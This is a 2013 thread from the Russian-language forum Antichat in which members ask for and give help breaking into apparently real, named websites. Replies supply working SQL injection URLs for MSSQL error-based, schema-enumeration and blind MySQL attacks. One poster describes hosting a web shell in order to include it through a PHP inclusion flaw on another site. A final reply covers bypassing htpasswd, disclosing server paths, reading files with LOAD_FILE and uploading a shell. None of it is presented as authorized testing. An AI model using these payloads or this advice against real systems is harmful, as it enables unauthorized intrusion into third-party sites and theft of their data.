ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
17.12.2013, 00:53
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
помогите раскрутить
Код:
http://www.zarya-poltavka.ru/item.asp?id=4807
кажысь там mssql но что-то никак не могу раскрутить... |
|
|
17.12.2013, 01:20
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от GhostW
помогите раскрутить
Код:
http://www.zarya-poltavka.ru/item.asp?id=4807
кажысь там mssql но что-то никак не могу раскрутить... http://www.zarya-poltavka.ru/item.asp?id=4807%20or%201=(select%20system_user)--
|
|
|
|
17.12.2013, 23:27
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от kingbeef
http://www.zarya-poltavka.ru/item.asp?id=4807%20or%201=(select%20system_user)--
Как-то всё просто получилось ... Спасибо, впредь буду более внимательным...
|
|
|
|
18.12.2013, 01:46
|
|
Новичок
Регистрация: 03.01.2012
Сообщений: 8
Провел на форуме:
1743
Репутация:
0
|
|
Уважаемые! Столкнулся с проблемкой по PHP инъекции.
Залил веб-шелл(P.A.S) на бесплатный хостинг(таймвеб). При попытке открыть ссылку на шелл в браузере - открывает. Но когда пробую поставить в адрес изучаемого сайта, то ошибка:
Сообщение от None
Warning: require_once() [function.require-once]: Filename cannot be empty in /home/content/l/e/o/leoarts/html/links/show.php on line 18
Fatal error: require_once() [function.require]: Failed opening required '' (include_path='.:/usr/local/php5/lib/php') in /home/content/l/e/o/leoarts/html/links/show.php on line 18
Линк:
Сообщение от None
http://links.leoartz.com/show.php?id=concept&lang=ru
|
|
|
|
18.12.2013, 02:13
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от MrKloud
Уважаемые! Столкнулся с проблемкой по PHP инъекции.
Залил веб-шелл(P.A.S) на бесплатный хостинг(таймвеб). При попытке открыть ссылку на шелл в браузере - открывает. Но когда пробую поставить в адрес изучаемого сайта, то ошибка:
Линк:
Если ты про параметр "lang", то там php-inj нет, просто кривовато написан скрипт. Он похоже сверяется со списком допустимых языков и если есть такой, то инклюдит языковой файл, если нет, то пытается заинклюдить пустую строку, но так как такого файла нет, то ошибка.
|
|
|
|
18.12.2013, 16:56
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от sav77
помогите раскрутить.
Сообщение от None
pb[antigoogle]kaybo1[antigoogle]com/rank/personal_list.html?page=
(select+max(table_name)+from+(select+top+1+table_n ame+from+information_schema.tables+where+table_nam e+not+in+(select+top+1+table_name+from+information _schema.tables+order+by+table_name)+order+by+table _name)a)
|
|
|
|
20.12.2013, 11:03
|
|
Новичок
Регистрация: 18.12.2013
Сообщений: 1
Провел на форуме:
290
Репутация:
0
|
|
Доброго времени суток, уважаемые.
Есть сайт io.ua. Когда вводишь union в, например, поле имени или пароля, то выкидывает на пустую страницу:
Сообщение от None
http://edit.io.ua/login.php?inick=union&ipass1=1
Подобное же наблюдается когда вводишь union в поле пароля к закрытому альбому.
Попытки как-нибудь обнаружить вручную уязвимость по разным мануалам, выложенным в сети ни к чему не привели. Также Netsparker после скана ничего толкового не выдал. Хотя это всё и не показатель - я нуб нубом в этом, а автоматизация и так понятно что не всегда верна.
Вопрос в том, является ли то, что выдается пустая страница сигналом, что есть уязвимость или же это у них стоит фильтр на union? |
|
|
|
20.12.2013, 17:28
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Ben Franc
Ben Franc said:
Доброго времени суток, уважаемые.
Есть сайт io.ua. Когда вводишь union в, например, поле имени или пароля, то выкидывает на пустую страницу:
Подобное же наблюдается когда вводишь union в поле пароля к закрытому альбому.
Попытки как-нибудь обнаружить вручную уязвимость по разным мануалам, выложенным в сети ни к чему не привели. Также Netsparker после скана ничего толкового не выдал. Хотя это всё и не показатель - я нуб нубом в этом, а автоматизация и так понятно что не всегда верна.
Вопрос в том, является ли то, что выдается пустая страница сигналом, что есть уязвимость или же это у них стоит фильтр на union?
На этом сайте практически везде, где можно использовать union, фильтр не позволяет, наоборот - вывода нет. Крутите если хотите, может что-то и получится)
Код:
http://io.ua/c14/u/Kiev. Nakoenec-to vypal sneg!/'or(1=(if(mid(version(),1,1)=5,1,0)))or'
Blind
|
|
|
|
20.12.2013, 19:29
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446
Репутация:
82
|
|
нужна помощь. есть сайт один, двиг дле, есть доступ к бд.могу дать любому юзеру админа, но на site.ru/admin.php стоит htpasswd
2 вопроса. как обойти хтпас и как раскрыть пути , возможно получится залить шел через бд
|
|
|
|
20.12.2013, 21:45
|
|
Познающий
Регистрация: 12.07.2011
Сообщений: 53
Провел на форуме:
10175
Репутация:
0
|
|
Сообщение от mazaxaka
нужна помощь. есть сайт один, двиг дле, есть доступ к бд.могу дать любому юзеру админа, но на site.ru/admin.php стоит htpasswd
2 вопроса. как обойти хтпас и как раскрыть пути , возможно получится залить шел через бд
Искать в гугле/бинге ошибки по соседям
Просканировать стандартные пути
В базе часто можно найти полные пути
Если есть пхпмайадмин возможно в нем есть баги(в 3.5.8 вообще шел залить можно)
Если file_priv=y есть попробовать прочитать логи
И бывало что мог каталог прочитать LOAD_FILEом
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
